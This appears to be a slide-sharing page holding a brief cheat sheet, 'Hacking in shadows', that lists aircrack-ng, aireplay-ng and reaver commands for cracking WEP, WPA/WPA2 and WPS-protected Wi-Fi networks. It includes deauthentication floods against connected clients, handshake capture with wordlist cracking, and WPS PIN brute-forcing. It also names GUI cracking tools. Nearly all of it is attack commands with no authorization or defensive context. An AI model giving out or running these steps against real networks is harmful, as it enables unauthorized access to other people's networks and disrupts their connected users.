Hacking WEP From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000
packet
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --
ignore-negative-one
step5 : aircrack-ng lab.cap
Hacking WPA & WPA2 From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
> wait for at least 1 4-way handshake
> > For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70
mon0 --ignore-negative-one
step5 : aircrack-ng -w wordlist lab.cap

December 31,
2014
NOTES]
Hacking WPS From Backtrack Linux Terminal
Reaver : [ crack wep-wpa-wpa2 ]
wash -i mon0
[ to se if WPS key is enable or not ( it should be enable) ] means [" wps locked option -- no "]
reaver -i mon0 -b <BSSID> -S --no-nacks -d7 -vv -c 1
NOTE : If u already have pin :
reaver -i mon0(or airoscript if you use fakeMAC) -b (bssid) -vv -c (channel) -e (name of AP) -p
(wps pin)
Graphical Interface Tools For Wi-Fi Hacking
 wifite
 Gerix Wi-Fi Cracker
 Fern Wi-Fi Cracker

Hacking in shadows By - Raghav Bisht

Recommended

Recommended

More Related Content

Viewers also liked

Viewers also liked (20)

Similar to Hacking in shadows By - Raghav Bisht

Similar to Hacking in shadows By - Raghav Bisht (20)

More from Raghav Bisht

More from Raghav Bisht (17)

Recently uploaded

Recently uploaded (20)

Hacking in shadows By - Raghav Bisht